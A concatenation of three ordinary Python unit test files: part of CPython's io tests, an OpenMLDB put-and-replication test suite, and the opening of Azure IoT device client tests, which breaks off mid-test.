encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEquals(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEquals(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEquals(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEquals(decoder.decode(input), "abc")
self.assertEquals(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEquals(dec.newlines, None)
self.assertEquals(dec.decode("\u0D00"), "\u0D00")
self.assertEquals(dec.newlines, None)
self.assertEquals(dec.decode("\u0A00"), "\u0A00")
self.assertEquals(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEquals(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEquals(f.name, support.TESTFN)
self.assertEquals(f.buffer.name, support.TESTFN)
self.assertEquals(f.buffer.raw.name, support.TESTFN)
self.assertEquals(f.mode, "U")
self.assertEquals(f.buffer.mode, "rb")
self.assertEquals(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEquals(f.mode, "w+")
self.assertEquals(f.buffer.mode, "rb+") # Does it really matter?
self.assertEquals(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEquals(g.mode, "wb")
self.assertEquals(g.raw.mode, "wb")
self.assertEquals(g.name, f.fileno())
self.assertEquals(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertTrue(isinstance(self.IOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.RawIOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.BufferedIOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.TextIOBase, abc.ABCMeta))
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertTrue(isinstance(f, abcmodule.RawIOBase))
self.assertFalse(isinstance(f, abcmodule.BufferedIOBase))
self.assertFalse(isinstance(f, abcmodule.TextIOBase))
with self.open(support.TESTFN, "wb") as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertFalse(isinstance(f, abcmodule.RawIOBase))
self.assertTrue(isinstance(f, abcmodule.BufferedIOBase))
self.assertFalse(isinstance(f, abcmodule.TextIOBase))
with self.open(support.TESTFN, "w") as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertFalse(isinstance(f, abcmodule.RawIOBase))
self.assertFalse(isinstance(f, abcmodule.BufferedIOBase))
self.assertTrue(isinstance(f, abcmodule.TextIOBase))
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
test_put.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from testcasebase import TestCaseBase
import threading
import time
from libs.deco import multi_dimension
from libs.logger import infoLogger
import libs.ddt as ddt
from libs.test_loader import load
import ctypes
import libs.utils as utils
@ddt.ddt
class TestPut(TestCaseBase):
def test_put_normal(self):
"""
put成功后可以scan出来
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2)
self.assertIn('Create table ok', rs1)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put ok', rs2)
time.sleep(1)
self.assertTrue(
'testvalue0' in self.scan(self.leader, self.tid, self.pid, 'testkey0', self.now(), 1))
@multi_dimension(False)
def test_put_slave_sync(self):
"""
put到leader后,slave同步成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 2, 'false')
self.assertIn('Create table ok', rs2)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put ok', rs2)
time.sleep(1)
self.assertIn(
'testvalue0', self.scan(self.slave1, self.tid, self.pid, 'testkey0', self.now(), 1))
@multi_dimension(True)
def test_put_slave_sync_md(self):
"""
put到leader后,slave同步成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 2, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs3)
rs4 = self.put(self.leader,
self.tid,
self.pid,
'',
self.now(),
'testvalue0', '1.1', 'testkey0')
self.assertIn('Put ok', rs4)
time.sleep(1)
self.assertIn(
'testvalue0', self.scan(self.slave1, self.tid, self.pid, {'card': 'testkey0'}, self.now(), 1))
def test_put_slave_cannot_put(self):
"""
slave不允许put
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs1)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put failed', rs2)
@multi_dimension(False)
def test_put_slave_killed_while_leader_putting(self):
"""
写数据过程中从节点挂掉,不影响主节点
重新启动后可以loadtable成功,数据与主节点一致
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
def put(count):
for i in range(0, count):
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() + 10000 + i,
'testvalue{}'.format(i))
def stop_client(endpoint):
self.stop_client(endpoint)
threads = [threading.Thread(
target=put, args=(20,)), threading.Thread(
target=stop_client, args=(self.slave1,))]
# 写入数据1s后节点挂掉
for t in threads:
t.start()
time.sleep(2)
for t in threads:
t.join()
time.sleep(10)
self.start_client(self.slave1)
utils.exe_shell('rm -rf {}/db/{}_{}/binlog'.format(self.slave1path, self.tid, self.pid))
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
self.assertIn('LoadTable ok', rs4)
time.sleep(1)
self.assertIn('testvalue19', self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now(), 1))
self.put(self.leader, self.tid, self.pid, 'testkey', self.now() + 10000, 'testvalue20')
time.sleep(1)
rs5 = self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now() * 2, 1)
self.assertIn('testvalue20', rs5)
@multi_dimension(True)
def test_put_slave_killed_while_leader_putting_md(self):
"""
写数据过程中从节点挂掉,不影响主节点
重新启动后可以loadtable成功,数据与主节点一致
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
def put(count):
for i in range(0, count):
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'testvalue{}'.format(i), '1.1', 'testkey')
def stop_client(endpoint):
self.stop_client(endpoint)
threads = [threading.Thread(
target=put, args=(20,)), threading.Thread(
target=stop_client, args=(self.slave1,))]
# 写入数据1s后节点挂掉
for t in threads:
t.start()
time.sleep(2)
for t in threads:
t.join()
time.sleep(10)
self.start_client(self.slave1)
utils.exe_shell('rm -rf {}/db/{}_{}/binlog'.format(self.slave1path, self.tid, self.pid))
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
self.assertIn('LoadTable ok', rs4)
time.sleep(1)
self.assertIn('testvalue19', self.scan(self.slave1, self.tid, self.pid, {'card':'testkey'}, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', 'str1'), 'card2': ('int32:index', 3), 'amt': ('double', 1.1)}, 'Put ok'),
({'card': ('string:index', 'card0')}, 'Put ok'),
({'card': ('string:index', 'str1'), 'card2': ('int32:index', 3), 'amt': ('double', '')},
'Encode dimension error'),
({'card': ('string:index', 'str1'), 'card2': ('int32', 3), 'amt': ('double', 1.1)}, 'Put ok'),
)
@ddt.unpack
def test_sput_index(self, kv, rsp_msg):
"""
创建高维表,对index进行测试
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('int32', 2147483647)},
'Put ok', {'card': '0'}, '2147483647'),
({'card': ('string:index', '1'), 's2': ('int32', 1.1)},
'Encode data error', {}, ''),
({'card': ('string:index', '2'), 's2': ('int32', 1e+5)},
'Encode data error', {}, ''),
({'card': ('string:index', '3'), 's2': ('int32', 'aaaa')},
'Encode data error', {}, ''),
({'card': ('string:index', '4'), 's2': ('int32', 2147483648)},
'Encode data error', {}, ''),
({'card': ('string:index', '5'), 's2': ('int32', -214)},
'Put ok', {'card': '5'}, '-214'),
({'card': ('string:index', '6'), 's2': ('int64', -9223372036854775808)},
'Put ok', {'card': '6'}, '-9223372036854775808'),
({'card': ('string:index', '7'), 's2': ('int64', -9223372036854775809)},
'Encode data error', {}, ''),
)
@ddt.unpack
def test_sput_int(self, kv, rsp_msg, scan_kv, scan_value):
"""
创建高维表,对int32和int64类型进行测试
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
if scan_kv != {}:
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
self.assertIn(' ' + str(scan_value) + ' ', rs2)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('uint32', 2147483648)},
'Put ok', {'card': '0'}, '2147483648'),
({'card': ('string:index', '1'), 's2': ('uint32', 1.1)},
'Encode data error', {}, ''),
({'card': ('string:index', '2'), 's2': ('uint32', 1e+5)},
'Encode data error', {}, ''),
({'card': ('string:index', '3'), 's2': ('uint32', 'aaaa')},
'Encode data error', {}, ''),
({'card': ('string:index', '4'), 's2': ('uint32', -2)},
'Encode data error', {}, ''),
({'card': ('string:index', '5'), 's2': ('uint64', 1)},
'Put ok', {'card': '5'}, 1),
({'card': ('string:index', '6'), 's2': ('uint64', -111111111111111111)},
'Encode data error', {}, ''),
)
@ddt.unpack
def test_sput_uint(self, kv, rsp_msg, scan_kv, scan_value):
"""
创建高维表,对uint32和uint64类型进行测试
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
if scan_kv != {}:
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
infoLogger.info(rs2)
self.assertIn(' ' + str(scan_value) + ' ', rs2)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('string', '\\"\\"\'\'^\\n')},
'Put ok', {'card': '0'}, '\"\"\'\'^\\n'),
({'card': ('string:index', '1'), 's2': ('string', '" "')},
'Bad put format, eg put tid pid time value', {}, ''),
({'card': ('string:index', '2'), 's2': ('string', 'a' * 128)},
'Put ok', {'card': '2'}, 'a' * 128),
({'card': ('string:index', '3'), 's2': ('string', 'a' * 129)},
'Put ok', {'card': '3'}, 'a' * 129),
)
@ddt.unpack
def test_sput_string(self, kv, rsp_msg, scan_kv, scan_value):
"""
创建高维表,对string类型进行测试
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
infoLogger.info(rs1)
self.assertIn(rsp_msg, rs1)
infoLogger.info(self.scan(
self.leader, self.tid, self.pid, scan_kv, self.now(), 1))
if scan_kv != {}:
self.assertIn(' ' + str(scan_value) + ' ', self.scan(
self.leader, self.tid, self.pid, scan_kv, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('float', 10.0)}, 'Put ok', {'card': '0'}, '10'),
({'card': ('string:index', '1'), 's2': ('float', 10.01)}, 'Put ok', {'card': '1'}, '10.0100002'),
({'card': ('string:index', '2'), 's2': ('float', -1e-1)}, 'Put ok', {'card': '2'}, '-0.100000001'),
({'card': ('string:index', '3'), 's2': ('float', 1e-10)}, 'Put ok', {'card': '3'}, '1.00000001e-10'),
({'card': ('string:index', '4'), 's2': ('double', -10.01)}, 'Put ok', {'card': '4'}, '-10.01'),
({'card': ('string:index', '5'), 's2': ('double', -1e-1)}, 'Put ok', {'card': '5'}, '-0.10000000000000001'),
({'card': ('string:index', '6'), 's2': ('double', 1e-10)}, 'Put ok', {'card': '6'}, '1e-10'),
)
@ddt.unpack
def test_sput_float_double(self, kv, rsp_msg, scan_kv, scan_value):
"""
创建高维表,对float和double类型进行测试
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
infoLogger.info(rs2)
self.assertIn(' ' + scan_value + ' ', rs2)
if __name__ == "__main__":
load(TestPut)
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURANCEConnectTests,
SharedIoTHubClientOCCURANCEDisconnectTests,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructre)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the handler manager, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
# cb_mock_init = mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback")
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
